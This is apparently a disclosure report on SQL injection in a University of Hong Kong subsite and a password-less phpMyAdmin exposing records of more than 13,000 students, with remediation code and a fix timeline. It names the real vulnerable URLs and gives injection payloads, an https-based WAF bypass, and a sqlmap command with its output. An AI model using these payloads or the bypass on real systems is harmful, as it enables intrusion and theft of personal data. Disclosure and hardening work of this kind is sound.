2015-10-09: Details reported to the vendor; awaiting vendor handling
2015-10-12: Vendor confirmed the report; details visible to the vendor only
2015-10-22: Details disclosed to core white-hat researchers and relevant domain experts
2015-10-29: Vendor fixed the vulnerability and chose public disclosure; details disclosed to the public

http://t.qq.com/p/t/470498077400717

A subsite of the University of Hong Kong has multiple SQL injection vulnerabilities, plus an unauthenticated-access vulnerability, leading to the exposure of sensitive information on more than 13,000 students (including plaintext passwords); the database could in turn be used to obtain system-level access to several servers.
#1 Injection points
http://www.mech.hku.hk/index.php?tpl=page&id=3
http://www.mech.hku.hk/index.php?tpl=news&cid=1
http://www.mech.hku.hk/index.php?tpl=people&cid=1
#2 A WAF is in front of the injection points, so automated tools cannot run against them directly
http://www.mech.hku.hk/index.php?tpl=news&cid=1 order by 4%23    # 4 columns
http://www.mech.hku.hk/index.php?tpl=news&cid=1 and 1=2 union select 1,2,3,4%23    # the server drops the connection outright
The bypass was simply to use the site's https hostname instead: the httpd configuration was set up incorrectly, so the same filtering did not apply over https.
python sqlmap.py -u "**.**.**.**/index.php?tpl=page&id=3" --dbs
#3 Injection succeeded
[*] starting at 21:19:41
[21:19:41] [INFO] resuming back-end DBMS 'mysql'
[21:19:41] [INFO] testing connection to the target URL
[21:19:41] [INFO] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[21:19:42] [INFO] it appears that the target is not protected
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tpl=page&id=3 AND 1674=1674

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: tpl=page&id=-1583 UNION ALL SELECT NULL,CONCAT(0x71707a7671,0x487566664b4178587a6a,0x7170717671)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: tpl=page&id=3 AND SLEEP(5)
---
[21:19:42] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0.11
[21:19:42] [INFO] fetching database names
[21:19:42] [WARNING] reflective value(s) found and filtering out
[21:19:42] [INFO] the SQL query used returns 2 entries
[21:19:42] [INFO] retrieved: information_schema
[21:19:43] [INFO] retrieved: mech
available databases [2]:
[*] information_schema
[*] mech
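The three payload types sqlmap reports above (boolean, UNION, time-based) all come from the same root cause: the `id` request parameter is placed into the SQL text itself. The following is an added illustration, not code from the mech.hku.hk site, of that pattern next to its fix. The `pages` table, its columns, and the connection credentials are assumptions; the `mech` database name is the one sqlmap enumerated.

```php
<?php
// Added example (not the affected site's code). Shows why a WAF alone does
// not fix "tpl=page&id=3" style injection, and what does.
// Assumed schema: table `pages` with columns id, title, body.

// VULNERABLE: the request parameter becomes part of the SQL statement, so
// "3 AND SLEEP(5)" or "-1583 UNION ALL SELECT ..." rewrite the query.
function getPageVulnerable(PDO $db, string $id): ?array
{
    $sql = "SELECT id, title, body FROM pages WHERE id = " . $id;
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HARDENED: validate the type first, then bind the value as a parameter.
// The value travels separately from the statement text, so it cannot change
// the query's structure regardless of what a WAF does or does not catch.
function getPageSafe(PDO $db, string $id): ?array
{
    // `id` must be a non-negative integer; reject anything else outright
    // rather than trying to "escape" it.
    if (!ctype_digit($id)) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, title, body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection for the hardened handler. Emulated prepares are disabled so the
// binding is done by MySQL itself, not by client-side string interpolation.
// 'app_user' / 'REPLACE-ME' are placeholders; use a least-privilege account
// that can only SELECT from the tables this front end needs.
$db = new PDO('mysql:host=localhost;dbname=mech;charset=utf8mb4', 'app_user', 'REPLACE-ME', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

$page = getPageSafe($db, $_GET['id'] ?? '');
if ($page === null) {
    http_response_code(404);
    exit;
}
echo htmlspecialchars($page['title'], ENT_QUOTES, 'UTF-8');
```

The same treatment applies to the `cid` parameter on the `news` and `people` templates. Because the fix lives in the query layer, it holds whether the request arrives over http or https, which is exactly the gap the WAF-per-virtual-host setup left open.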
#END As a bonus, an unauthenticated-access vulnerability, leading to the exposure of sensitive information on more than 13,000 students, and indirectly usable through the database to obtain system-level access to several servers.
http://ns1.caes.hku.hk/phpmyadmin    phpMyAdmin can be accessed directly with no password
The User table in the student database holds the records of more than 13,000 students.
Host name: caes
Operating system: Linux 2.6.32-74-server
Apache: Apache/2.2.14 (Ubuntu)
PHP: 5.3.2-1ubuntu4.30
MySQL: 5.1.73-0ubuntu**.**.**.**
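The report does not say how the phpMyAdmin instance came to be open; one configuration that produces exactly this symptom is `config`-type authentication with a stored account, which logs every visitor in without a prompt. The following is an added example, not the server's real `config.inc.php`: the weak configuration (an assumption about the cause) beside a hardened one. Only one of the two server blocks belongs in an actual config file, and the address ranges are placeholders.

```php
<?php
/* Added example, not the affected server's config.inc.php.
 * Block A reproduces a "no password needed" phpMyAdmin (assumed cause).
 * Block B is the hardened form. Keep only one block in a real file.
 */

/* ---- Block A (weak): credentials stored in the config, so the browser is
 *      never asked for anything and every visitor acts as this account. ---- */
$i = 1;
$cfg['Servers'][$i]['host']            = 'localhost';
$cfg['Servers'][$i]['auth_type']       = 'config';
$cfg['Servers'][$i]['user']            = 'root';
$cfg['Servers'][$i]['password']        = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;   // also lets empty-password accounts in

/* ---- Block B (hardened) ---- */
// Required for cookie auth: replace with 32 bytes of random data.
$cfg['blowfish_secret'] = 'REPLACE-WITH-32-RANDOM-BYTES';

$i = 1;
$cfg['Servers'][$i]['host']            = 'localhost';
$cfg['Servers'][$i]['auth_type']       = 'cookie';  // ask for credentials each session
$cfg['Servers'][$i]['AllowNoPassword'] = false;     // refuse accounts with an empty password
$cfg['Servers'][$i]['AllowRoot']       = false;     // administer via a dedicated, limited account

// Deny by default; only the listed source addresses may log in at all.
// 'allow,deny' = allow rules first, everything else denied.
$cfg['Servers'][$i]['AllowDeny']['order'] = 'allow,deny';
$cfg['Servers'][$i]['AllowDeny']['rules'] = [
    'allow % from 127.0.0.1',          // local administration
    'allow % from 10.0.0.0/8',         // placeholder: the admin network
];

// Expire idle sessions after 15 minutes instead of the 24-minute default.
$cfg['LoginCookieValidity'] = 900;
```

Even with Block B in place, a database administration console should not be reachable from the public internet at all: restrict it at the web server or firewall to the admin network, and give the `student` database its own account rather than exposing the whole server through a shared `root` login.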
#1 Improve the WAF detection rules
#2 Properly escape (or parameterize) the parameters affected by SQL injection

Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-10-12 18:14
The incident has been reported to the organization concerned.
2015-10-29: The organization concerned reports that the vulnerability has been fixed.